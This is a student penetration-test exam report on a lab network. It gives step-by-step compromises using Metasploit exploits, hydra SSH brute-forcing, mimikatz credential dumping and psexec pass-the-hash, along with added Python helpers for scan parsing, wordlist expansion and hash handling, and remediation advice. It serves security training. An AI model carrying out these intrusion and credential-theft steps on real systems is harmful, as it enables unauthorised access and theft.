Ape-Testing, LLC

Final Penetration Test


3.12.2018

This Report was Prepared By:


Taco Lemur Security
Alyssa Evans
alyevans@uat.edu
Table of Contents
Introduction
Summary of Findings
SPIDER
FOX
OWL
MONGOOSE
FROG
LION
Feedback

Introduction
Taco Lemur Security was tasked with demonstrating the knowledge and skills needed to be
contracted as a local company's penetration tester. The layout of the network was discovered
with reconnaissance techniques learned earlier in the course, using the Kali Linux system
provided.

Summary of Findings
What are the IP addresses of the servers on your network?
192.168.1.90: Spider
192.168.37.10: Lion
192.168.37.20: Fox
192.168.37.30: Owl
192.168.37.50: Mongoose
192.168.37.250: Frog
What information from a compromised host might you be able to use to find out if the company
has any other servers?
Knowing that more services are needed to keep the network running, and that the servers
providing them have not been discovered yet, helps. Running nmap -sn 192.168.1.1/16 (a ping
sweep of the whole 192.168.0.0/16 range) returns a list of live hosts, which can then be
cross-referenced against what is already known of the network. The compromised host itself
also carries leads: its ARP cache, routing table and DNS settings name the machines it already
talks to.
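The cross-referencing step above, as an added example that is not part of the original report: a Python script that parses a host sweep in nmap's grepable output format (nmap -sn -oG) and diffs it against the hosts the report has already catalogued. The sweep output, and the extra host 192.168.37.40 it contains, are constructed for illustration and are not results from the engagement.

```python
"""Cross-reference an nmap -sn host sweep against the hosts already catalogued.

Added example, not part of the original report. The nmap output below is a
constructed sample in nmap's grepable (-oG) format, not a real scan result.
"""
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Hosts the report already identified.
KNOWN_HOSTS: Dict[str, str] = {
    "192.168.1.90": "Spider",
    "192.168.37.10": "Lion",
    "192.168.37.20": "Fox",
    "192.168.37.30": "Owl",
    "192.168.37.50": "Mongoose",
    "192.168.37.250": "Frog",
}

# Constructed sample of `nmap -sn -oG - 192.168.37.0/24` (not a real scan).
# 192.168.37.40 is invented here to show an undocumented host being caught.
SAMPLE_SWEEP = """\
# Nmap 7.70 scan initiated Mon Mar 12 10:00:00 2018 as: nmap -sn -oG - 192.168.37.0/24
Host: 192.168.37.10 ()\tStatus: Up
Host: 192.168.37.20 (fox.hackme)\tStatus: Up
Host: 192.168.37.30 ()\tStatus: Up
Host: 192.168.37.40 ()\tStatus: Up
Host: 192.168.37.250 ()\tStatus: Up
# Nmap done at Mon Mar 12 10:00:05 2018 -- 256 IP addresses (5 hosts up) scanned in 4.71 seconds
"""

# One "Host:" line per responding address; the hostname in parentheses may be empty.
HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Status:\s+Up\s*$")


def parse_live_hosts(grepable: str) -> List[str]:
    """Return the addresses nmap reported as Up, in scan order."""
    hosts = []
    for line in grepable.splitlines():
        m = HOST_LINE.match(line)
        if m:
            hosts.append(m.group(1))
    return hosts


def unknown_hosts(grepable: str, known: Dict[str, str]) -> List[str]:
    """Live hosts that the report has not catalogued: candidates for new servers."""
    live = set(parse_live_hosts(grepable))
    return sorted(live - set(known), key=ip_address)


def missing_hosts(grepable: str, known: Dict[str, str], scanned: str) -> List[str]:
    """Catalogued hosts inside the scanned range that did not answer.

    A known host that goes quiet usually means a firewall now filters it or
    the box needs a restart, so it is worth reporting rather than ignoring.
    """
    net = ip_network(scanned)
    live = set(parse_live_hosts(grepable))
    in_range = [h for h in known if ip_address(h) in net]
    return sorted(set(in_range) - live, key=ip_address)


if __name__ == "__main__":
    print("live:", parse_live_hosts(SAMPLE_SWEEP))
    print("not in report:", unknown_hosts(SAMPLE_SWEEP, KNOWN_HOSTS))
    print("catalogued but silent:", missing_hosts(SAMPLE_SWEEP, KNOWN_HOSTS, "192.168.37.0/24"))
```

Spider (192.168.1.90) is outside the scanned /24, so it is not reported as missing; Mongoose (192.168.37.50) is inside it and silent in the sample, which is exactly the "restart the box" situation mentioned in the feedback section.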
After your penetration test, what are your detailed recommendations to this company regarding
fixing their vulnerabilities?
Upgrade to a vendor-supported OS that still receives security updates (in 2018, Windows 7
or later); the Windows XP hosts here left support in 2014 and are still missing the
MS08-067 patch released in 2008. Ensure that passwords are unrelated to the user and to
anything published on the company website, since the Frog account fell to a wordlist built
from the first web page. Make the firewall as restrictive as possible, close all
unnecessary ports such as 445, and make sure that all servers are running current, updated
software, unlike Easy FTP Server and Easy Chat Server, whose installed versions have public
exploits.

SPIDER
What services are running on server 1?
Apache httpd 2.0.64 (port 80)
netbios-ssn (port 139)
Microsoft Windows XP microsoft-ds (SMB over TCP, port 445)

What else can you find out about this service? (hint: Google).
Port 445 carries SMB directly over TCP/IP (Microsoft-DS), giving Windows file sharing and
RPC access without the NetBIOS session layer on port 139.
Provide detailed information on how you compromised this server.
Start with port 80: point a web browser at http://192.168.1.90 and see what information
can be discovered. Nothing useful about the other ports is published there, and nothing is
hidden in the page source. Port 445 has a known vulnerability, however: the host is Windows
XP, and its Server service is exploitable over SMB with MS08-067 (CVE-2008-4250). Open
Metasploit, type "use exploit/windows/smb/ms08_067_netapi" and press Enter. Type "show
options" to verify which parameters must be set (the target address at minimum, plus the
payload and listener address for a reverse shell). Set them and type "exploit". When a
Meterpreter session opens, navigate through the directory tree until the secret file is
shown, then download it.

What are the contents of the file located on this server at “C:\” ?

FOX
What services are running on server 1?
HTTP and HTTPS

What else can you find out about this service? (hint: Google).
Port 80 is the default port for HTTP, the protocol behind the World Wide Web, and port 443
carries HTTPS, HTTP over TLS, for secure web browser communication.
Provide detailed information on how you compromised this server.
Browse to port 80 to discover that the host is running Easy Chat Server, which has a known
vulnerability in its handling of the username parameter (the flaw the Metasploit module is
named after). Open Metasploit, type "use exploit/windows/http/easychatserver_username" and
press Enter. Type "show options" to verify which parameters must be set (target address and
port, payload and listener address). Set them and type "exploit". When successful, navigate
through the directory tree until the secret file is shown, then download it.

What are the contents of the file located on this server at “C:\” ?

OWL
What services are running on server 1?
EasyFTP Server ftpd

What else can you find out about this service? (hint: Google).
Port 21 is the reserved TCP port used by the File Transfer Protocol (FTP) for its control
connection, over which logins and commands are sent to the FTP server.
Provide detailed information on how you compromised this server.
Port 8080 serves a web application that requires a username and password that are not
known, and nothing useful is hidden in its page source. Anonymous FTP on port 21 is
attempted next, but files cannot be accessed without a valid login and the password is
unknown. Port 21 does have a known vulnerability, however: a buffer overflow in EasyFTP
Server's handling of the CWD command, which the module below exploits. Open Metasploit,
type "use exploit/windows/ftp/easyftp_cwd_fixret" and press Enter. Type "show options" to
verify which parameters must be set (target address, payload and listener address). Set
them and type "exploit". When successful, navigate through the directory tree until the
secret file is shown, then download it.

What are the contents of the file located on this server at “C:\” ?

MONGOOSE
What services are running on server 1?
Microsoft ESMTP 6.0.2600.2180
Microsoft IIS httpd 5.1
Microsoft SQL Server 2005 9.00.1399; RTM
Microsoft Windows RPC
Microsoft ftpd

What else can you find out about this service? (hint: Google).
Port 1433 is the default listening port for Microsoft SQL Server, and the build found here
(9.00.1399, the 2005 RTM release with no service pack applied) has known vulnerabilities.
Provide detailed information on how you compromised this server.
Based on the hint and knowing it is an SQL server, the following was discovered when
searching for exploits. Each module is loaded with "use <module>" followed by "show
options" to verify which parameters must be set (the target address at minimum and, for the
modules that authenticate, the SQL username and password); set them and type "run"
("exploit" is accepted as an alias for the auxiliary modules). The modules used, in order,
were auxiliary/admin/mssql/mssql_exec, which runs an OS command through xp_cmdshell with a
valid login; auxiliary/scanner/mssql/mssql_login, which brute-forces SQL logins such as sa;
auxiliary/admin/mssql/mssql_enum, which enumerates server configuration, logins and
databases; and exploit/windows/mssql/mssql_payload, which uses the login to execute a
payload and open a Meterpreter session. When successful, navigate through the directory
tree until the secret file is shown, then download it.

What are the contents of the file located on this server at “C:\” ?

FROG
What services are running on server 1?
OpenSSH 3.8.1p1 (protocol 2.0)

What else can you find out about this service? (hint: Google).
Port 22 is the default port for the Secure Shell (SSH) protocol, which most commonly provides
encrypted command-line access as a replacement for Telnet.
Provide detailed information on how you compromised this server.
Based on the hint, and knowing that SSH requires a username and password, a series of
wordlists was used to brute-force the account, including information from the first web
page discovered. In the terminal type "hydra -L /root/Desktop/test.txt -P
/root/Desktop/test.txt -e nsr 192.168.37.250 ssh". The file test.txt is the generated list
of possible usernames and passwords; passing it as both -L and -P tries every word as both,
and -e nsr additionally tries, for each login, an empty password (n), the login itself (s)
and the login reversed (r). When a valid pair is found, ssh to 192.168.37.250 with it and
navigate through the directory tree until the secret file is shown. Type
"more secretfile4.txt" and press Enter to view the file.
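An added example, not part of the original report, showing what the hydra command above actually enumerates. The script harvests words from a web page the way the report describes (the page text is constructed for illustration, not Ape-Testing's real site), uses them as both the -L and -P list, and expands hydra's -e nsr options so the candidate set can be reviewed before the noisy brute-force run.

```python
"""What `hydra -L test.txt -P test.txt -e nsr` actually tries.

Added example, not part of the original report. The page text below is a
constructed stand-in for "the first web page discovered".
"""
import re
from typing import List, Tuple

# Constructed stand-in for the company web page (not Ape-Testing's real site).
HARVESTED_PAGE = """\
Welcome to Ape-Testing, LLC. Questions? Contact our administrator Bob Smith,
bob@ape-testing.example, or the helpdesk staff: alice, carol and dave.
Serving the community since 1999.
"""

# Filler words that are unlikely to be anyone's login or password.
STOPWORDS = {"the", "and", "our", "since", "welcome", "contact", "questions"}


def harvest_words(text: str, min_len: int = 3) -> List[str]:
    """Lowercase tokens from the page, deduplicated, in order of first appearance."""
    seen = set()
    words = []
    for tok in re.findall(r"[A-Za-z0-9]+", text.lower()):
        if len(tok) >= min_len and tok not in STOPWORDS and tok not in seen:
            seen.add(tok)
            words.append(tok)
    return words


def expand_e_nsr(logins: List[str], passwords: List[str], flags: str = "nsr") -> List[Tuple[str, str]]:
    """Mirror hydra's -e options for each login, then append the -P wordlist.

    n: empty password, s: password same as the login, r: login reversed.
    Duplicates are dropped so the count reflects real attempts.
    """
    pairs: List[Tuple[str, str]] = []
    seen = set()

    def add(login: str, password: str) -> None:
        if (login, password) not in seen:
            seen.add((login, password))
            pairs.append((login, password))

    for login in logins:
        if "n" in flags:
            add(login, "")
        if "s" in flags:
            add(login, login)
        if "r" in flags:
            add(login, login[::-1])
        for pw in passwords:
            add(login, pw)
    return pairs


def hydra_candidates(page_text: str, flags: str = "nsr") -> List[Tuple[str, str]]:
    """Same word list as both -L and -P, exactly as the report's command does."""
    words = harvest_words(page_text)
    return expand_e_nsr(words, words, flags)


if __name__ == "__main__":
    cands = hydra_candidates(HARVESTED_PAGE)
    print(len(harvest_words(HARVESTED_PAGE)), "words ->", len(cands), "login/password attempts")
    for login, pw in cands[:6]:
        print(f"{login!r}:{pw!r}")
```

The candidate count grows as words squared, which is why a page-derived list works against a box like Frog but becomes slow and loud against a real target; the same expansion is what a defender's lockout policy and an "unrelated to the user" password rule are meant to defeat.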

What are the contents of the file located on this server at “C:\” ?

LION
What services are running on server 1?
Netbios-ssn
Microsoft Windows XP microsoft-ds

What else can you find out about this service? (hint: Google).
Port 445 carries SMB directly over TCP/IP (Microsoft-DS), giving Windows file sharing and
RPC access without the NetBIOS session layer on port 139.
Provide detailed information on how you compromised this server.
Based on the hints and advice given with the previous box, in the command window type
"netsh firewall set opmode disable" and press Enter; this disables the Windows Firewall on
the box. Open Metasploit, type "use exploit/windows/smb/ms08_067_netapi" and press Enter.
Type "show options" to verify which parameters must be set, set them and type "exploit". In
the Meterpreter session, type "getuid" to verify that the server username is
NT AUTHORITY\SYSTEM; if it is not, type "getsystem". Type "load mimikatz", then "kerberos"
to retrieve any Kerberos credentials cached in memory. Type "hashdump" and save its output
(one line per local account, in user:RID:LM hash:NT hash::: form) for later. Type
"background", press Enter, answer "y" and press Enter to keep the session open. Type
"use auxiliary/scanner/portscan/tcp", then "show options", set the parameters and type
"run". When done properly, it lists 192.168.37.10 as having ports 445 and 139 open. Type
"use exploit/windows/smb/ms08_067_netapi" again, then "show options", set the parameters
and type "exploit". Then type "use exploit/windows/smb/psexec" and press Enter. Type "show
options" and set SMBUser to an account from the hashdump, SMBPass to that account's LM:NT
hash pair (psexec accepts the hashes in place of a password, so they never need to be
cracked) and SMBDomain to HACKME, then type "exploit". When successful, type "sysinfo" to
verify you are on the final server, then navigate through the directory tree until the
secret file is shown and download it.
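The hashdump-to-psexec handoff above, as an added example that is not part of the original report. The Python below parses Meterpreter hashdump output (user:RID:LM:NT:::), flags blank and reused passwords, and produces the SMBUser/SMBPass/SMBDomain values psexec needs. The hash lines are a constructed sample, not the hashes recovered on the engagement; only the two well-known empty-password hashes are real values.

```python
"""Turn Meterpreter hashdump output into what exploit/windows/smb/psexec needs.

Added example, not part of the original report. The hash lines below are a
constructed sample in hashdump's user:rid:LM:NT::: format; only the two
well-known "empty" hashes are real values, the rest are made up.
"""
import re
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is empty/disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample (not the hashes recovered during the engagement).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:1a2b3c4d5e6f70819a2b3c4d5e6f7081:9f8e7d6c5b4a39281716a5b4c3d2e1f0:::
backupsvc:1004:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
"""

HASH_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


class Cred(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text: str) -> List[Cred]:
    """Parse hashdump lines, skipping anything that is not a well-formed entry."""
    creds = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            creds.append(Cred(m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()))
    return creds


def smbpass(cred: Cred) -> str:
    """psexec's SMBPass accepts LM:NT in place of a cleartext password (pass-the-hash)."""
    return f"{cred.lm}:{cred.nt}"


def blank_password_users(creds: List[Cred]) -> List[str]:
    """Accounts whose NT hash is the empty-password hash: no cracking needed at all."""
    return [c.user for c in creds if c.nt == EMPTY_NT]


def shared_nt_hashes(creds: List[Cred]) -> Dict[str, List[str]]:
    """NT hashes used by more than one account: the same password reused, so one
    hash may open several accounts (and, for a shared local admin, several hosts)."""
    by_hash: Dict[str, List[str]] = {}
    for c in creds:
        by_hash.setdefault(c.nt, []).append(c.user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def psexec_settings(cred: Cred, rhost: str, domain: str = "HACKME") -> Dict[str, str]:
    """The option values to `set` in exploit/windows/smb/psexec for this credential."""
    return {"RHOST": rhost, "SMBUser": cred.user, "SMBPass": smbpass(cred), "SMBDomain": domain}


if __name__ == "__main__":
    creds = parse_hashdump(SAMPLE_HASHDUMP)
    print("blank passwords:", blank_password_users(creds))
    print("reused hashes:", shared_nt_hashes(creds))
    admin = next(c for c in creds if c.rid == 500)
    for k, v in psexec_settings(admin, "192.168.37.10").items():
        print(f"set {k} {v}")
```

RHOST is the option name in the Metasploit release used at the time; current releases call it RHOSTS. The reuse check is the reason the pivot in this section works: a local administrator password shared between boxes means the hash taken from the first one authenticates to the second without ever being cracked.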

What are the contents of the file located on this server at “C:\” ?

Feedback
What did you think of the final?
I thought it was the right amount of difficulty. There were times when it was
challenging, but not to the point of impossible to complete.
How much time did you spend on this exam?
8-10 hours
What other feedback do you have? Think of anything that didn’t work as it was supposed to, any
issues that you had, anything you think should change, or positive stuff is cool too.
It was good to put a reminder to restart the box if the services seem down. One of
my boxes kept saying that it had all 1000 ports filtered until I remembered that it
may have just needed a restart. I feel a reminder not to overthink things may also be a
good idea in the future. There are a few opportunities where overthinking could
happen, but it could be easily avoided by just reminding us that it may be as simple as it
seems.
